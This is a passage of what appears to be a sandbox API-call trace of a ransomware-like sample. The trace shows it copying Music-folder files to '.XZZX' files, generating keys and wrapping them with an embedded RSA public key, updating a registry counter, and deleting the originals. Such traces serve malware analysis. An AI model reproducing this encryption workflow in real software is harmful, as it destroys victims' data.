SetErrorMode (uMode=0x1) returned 0x1 [0119.283] lstrcpyW (in: lpString1=0x434f860, lpString2="_iJcWlMQ1CRXwuy.m4a" | out: lpString1="_iJcWlMQ1CRXwuy.m4a") returned="_iJcWlMQ1CRXwuy.m4a" [0119.283] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0xaa237105, Data2=0x45ff, Data3=0x4768, Data4=([0]=0x96, [1]=0xae, [2]=0xad, [3]=0x7, [4]=0xd5, [5]=0x6b, [6]=0x45, [7]=0xe9))) returned 0x0 [0119.283] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\_iJcWlMQ1CRXwuy.m4a") returned 92 [0119.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0119.283] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\06C3ECFB13862898AA23710517BB0CE0.XZZX") returned 110 [0119.283] StrStrW (lpFirst="_iJcWlMQ1CRXwuy.m4a", lpSrch="XZZX") returned 0x0 [0119.283] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\_iJcWlMQ1CRXwuy.m4a", dwFileAttributes=0x20) returned 1 [0119.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\_iJcWlMQ1CRXwuy.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\_ijcwlmq1crxwuy.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x574 [0119.284] ReadFile (in: hFile=0x574, lpBuffer=0x3ce2d60, nNumberOfBytesToRead=0x124f8, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3ce2d60*, lpNumberOfBytesRead=0x434e418*=0x124f8, lpOverlapped=0x0) returned 1 [0119.287] CloseHandle (hObject=0x574) returned 1 [0119.288] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0119.288] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0119.288] SetErrorMode (uMode=0x1) returned 0x1 [0119.288] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0119.288] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc6900) returned 1 [0119.292] CryptGenKey (in: hProv=0x3cc6900, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5a50) returned 1 [0119.520] CryptExportKey (in: hKey=0x3a5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0119.520] CryptExportKey (in: hKey=0x3a5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x434e41c | out: pbData=0x4350000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0119.520] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0119.520] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0119.520] CryptDestroyKey (hKey=0x3a5a50) returned 1 [0119.520] CryptReleaseContext (hProv=0x3cc6a98, dwFlags=0x0) returned 0 [0119.521] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\06C3ECFB13862898AA23710517BB0CE0.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\06c3ecfb13862898aa23710517bb0ce0.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x580 [0119.604] WriteFile (in: hFile=0x580, lpBuffer=0x3ce2d60*, nNumberOfBytesToWrite=0x124f8, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce2d60*, lpNumberOfBytesWritten=0x434e438*=0x124f8, lpOverlapped=0x0) returned 1 [0119.605] SetFilePointer (in: hFile=0x580, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x124f8 [0119.605] WriteFile (in: hFile=0x580, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0119.605] SetFilePointer (in: hFile=0x580, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x124fd [0119.605] WriteFile (in: hFile=0x580, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x26, lpOverlapped=0x0) returned 1 [0119.605] SetFilePointer (in: hFile=0x580, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x12523 [0119.605] WriteFile (in: hFile=0x580, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0119.605] SetFilePointer (in: hFile=0x580, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x12528 [0119.605] SetErrorMode (uMode=0x1) returned 0x1 [0119.605] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0119.605] OutputDebugStringW (lpOutputString="end") [0119.606] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.606] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0119.606] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3cc6b20) returned 1 [0119.606] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc6b20, dwCertEncodingType=0x1, pInfo=0x3cb1288*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb12b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb12c0*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3a5bd0) returned 1 [0119.606] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0119.607] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0119.607] CryptEncrypt (in: hKey=0x3a5bd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0119.607] CryptEncrypt (in: hKey=0x3a5bd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc6ba8*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc6ba8*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0119.607] WriteFile (in: hFile=0x580, lpBuffer=0x3cc6ba8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc6ba8*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0119.607] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0119.607] WriteFile (in: hFile=0x580, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0119.607] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0119.607] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0119.607] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x58c) returned 0x0 [0119.607] RegQueryValueExW (in: hKey=0x58c, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0x77, lpcbData=0x434dfdc*=0x4) returned 0x0 [0119.607] RegCloseKey (hKey=0x58c) returned 0x0 [0119.607] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x58c) returned 0x0 [0119.607] RegSetValueExW (in: hKey=0x58c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0x78, cbData=0x4 | out: lpData=0x434dfec*=0x78) returned 0x0 [0119.607] RegCloseKey (hKey=0x58c) returned 0x0 [0119.608] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.608] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.608] CloseHandle (hObject=0x580) returned 1 [0119.609] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0119.610] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0119.610] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\_iJcWlMQ1CRXwuy.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\_ijcwlmq1crxwuy.m4a")) returned 1 [0119.611] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\_iJcWlMQ1CRXwuy.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\_ijcwlmq1crxwuy.m4a")) returned 0 Thread: id = 384 os_tid = 0x908 [0119.478] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0119.478] lstrcpyW (in: lpString1=0x420f460, lpString2="3vgH.m4a" | out: lpString1="3vgH.m4a") returned="3vgH.m4a" [0119.478] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0119.478] SetErrorMode (uMode=0x1) returned 0x1 [0119.478] lstrcpyW (in: lpString1=0x420f860, lpString2="3vgH.m4a" | out: lpString1="3vgH.m4a") returned="3vgH.m4a" [0119.478] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x1f3de7c5, Data2=0x18d0, Data3=0x4c0b, Data4=([0]=0x99, [1]=0x75, [2]=0xd, [3]=0xe9, [4]=0x61, [5]=0x3b, [6]=0x4f, [7]=0xc1))) returned 0x0 [0119.478] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\3vgH.m4a") returned 87 [0119.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0119.478] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\3006C810075ED0F01F3DE7C50B7FB538.XZZX") returned 116 [0119.478] StrStrW (lpFirst="3vgH.m4a", lpSrch="XZZX") returned 0x0 [0119.478] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\3vgH.m4a", dwFileAttributes=0x20) returned 1 [0119.479] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\3vgH.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\3vgh.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x580 [0119.479] ReadFile (in: hFile=0x580, lpBuffer=0x3ccd980, nNumberOfBytesToRead=0x11d29, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3ccd980*, lpNumberOfBytesRead=0x420e418*=0x11d29, lpOverlapped=0x0) returned 1 [0119.480] CloseHandle (hObject=0x580) returned 1 [0119.480] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0119.480] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0119.480] SetErrorMode (uMode=0x1) returned 0x1 [0119.480] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0119.480] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc6a98) returned 1 [0119.483] CryptGenKey (in: hProv=0x3cc6a98, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5c10) returned 1 [0119.614] CryptExportKey (in: hKey=0x3a5c10, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0119.614] CryptExportKey (in: hKey=0x3a5c10, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0119.614] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0119.615] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0119.615] CryptDestroyKey (hKey=0x3a5c10) returned 1 [0119.615] CryptReleaseContext (hProv=0x3cc6a98, dwFlags=0x0) returned 0 [0119.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\3006C810075ED0F01F3DE7C50B7FB538.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\3006c810075ed0f01f3de7c50b7fb538.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x57c [0119.615] WriteFile (in: hFile=0x57c, lpBuffer=0x3ccd980*, nNumberOfBytesToWrite=0x11d29, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ccd980*, lpNumberOfBytesWritten=0x420e438*=0x11d29, lpOverlapped=0x0) returned 1 [0119.617] SetFilePointer (in: hFile=0x57c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11d29 [0119.617] WriteFile (in: hFile=0x57c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0119.617] SetFilePointer (in: hFile=0x57c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11d2e [0119.617] WriteFile (in: hFile=0x57c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x10, lpOverlapped=0x0) returned 1 [0119.617] SetFilePointer (in: hFile=0x57c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11d3e [0119.617] WriteFile (in: hFile=0x57c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0119.617] SetFilePointer (in: hFile=0x57c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11d43 [0119.617] SetErrorMode (uMode=0x1) returned 0x1 [0119.617] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0119.617] OutputDebugStringW (lpOutputString="end") [0119.618] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.618] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0119.618] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc6c30) returned 1 [0119.618] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc6c30, dwCertEncodingType=0x1, pInfo=0x3cb10e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1118*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1120*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5c10) returned 1 [0119.618] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0119.619] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0119.619] CryptEncrypt (in: hKey=0x3a5c10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0119.619] CryptEncrypt (in: hKey=0x3a5c10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc6cb8*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc6cb8*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0119.619] WriteFile (in: hFile=0x57c, lpBuffer=0x3cc6cb8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc6cb8*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0119.619] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0119.619] WriteFile (in: hFile=0x57c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0119.619] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0119.620] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0119.620] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x580) returned 0x0 [0119.620] RegQueryValueExW (in: hKey=0x580, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x78, lpcbData=0x420dfdc*=0x4) returned 0x0 [0119.620] RegCloseKey (hKey=0x580) returned 0x0 [0119.620] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x580) returned 0x0 [0119.620] RegSetValueExW (in: hKey=0x580, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x79, cbData=0x4 | out: lpData=0x420dfec*=0x79) returned 0x0 [0119.620] RegCloseKey (hKey=0x580) returned 0x0 [0119.620] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.620] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.621] CloseHandle (hObject=0x57c) returned 1 [0119.622] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0119.622] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0119.622] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\3vgH.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\3vgh.m4a")) returned 1 [0119.623] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\3vgH.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\3vgh.m4a")) returned 0 Thread: id = 385 os_tid = 0x90c [0119.624] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 